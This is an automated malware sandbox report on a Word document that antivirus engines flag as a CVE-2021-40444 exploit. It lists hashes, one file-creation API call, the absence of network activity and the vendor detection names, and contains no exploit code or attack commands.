Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 14, 2021, 5:23 p.m.	Sept. 14, 2021, 5:26 p.m.

Size	12.8KB
Type	Microsoft OOXML
MD5	`3c64e8a4bfdce7c4f19a441d13413acb`
SHA256	`dd1f09bb538a31c2c0e4f3218aa4a989256691e73738c7bfb7a60e6db9b7b0cf`
CRC32	`655A664D`
ssdeep	`192:76O3KmBOJ2wc3rMKkViP/kcMD2h0v5MJnJv18H111M05AgPekpn/w:76O3fBIhV8/6hv5MJnJ2H111/eqn/w`
Yara	docx - Word 2007 file format detection

WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\document.docx
1108

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

No Suricata Alerts

No Suricata TLS

file	C:\Users\test22\AppData\Local\Temp\~$cument.docx

Time & API	Arguments	Status	Return	Repeated
NtCreateFile Sept. 14, 2021, 5:23 p.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x000003ec filepath: C:\Users\test22\AppData\Local\Temp\~$cument.docx desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$cument.docx create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0

ClamAV	Doc.Exploit.CVE_2021_40444-9891528-0
CAT-QuickHeal	OLE.CVE-2021-40444.44117
McAfee	Exploit-CVE2021-40444.a
Arcabit	Exploit.CVE-2021-40444.Gen.1
ESET-NOD32	DOC/TrojanDownloader.Agent.DHY
Avast	XML:CVE-2021-40444-A [Expl]
Kaspersky	HEUR:Exploit.MSOffice.CVE-2021-40444.a
BitDefender	Exploit.CVE-2021-40444.Gen.1
NANO-Antivirus	Exploit.Xml.CVE-2017-0199.equmby
MicroWorld-eScan	Exploit.CVE-2021-40444.Gen.1
Rising	Exploit.CVE-2021-40444!1.D97D (CLASSIC)
Ad-Aware	Exploit.CVE-2021-40444.Gen.1
Emsisoft	Exploit.CVE-2021-40444.Gen.1 (B)
DrWeb	Exploit.CVE-2021-40444.1
McAfee-GW-Edition	Exploit-CVE2021-40444.a
FireEye	Exploit.CVE-2021-40444.Gen.1
GData	Script.Exploit.CVE-2021-40444.A
MAX	malware (ai score=86)
Microsoft	TrojanDownloader:O97M/Donoff.SA!Gen
ZoneAlarm	HEUR:Exploit.MSOffice.CVE-2021-40444.a
Fortinet	MSOffice/Agent.DHY!tr
AVG	XML:CVE-2021-40444-A [Expl]

document.docx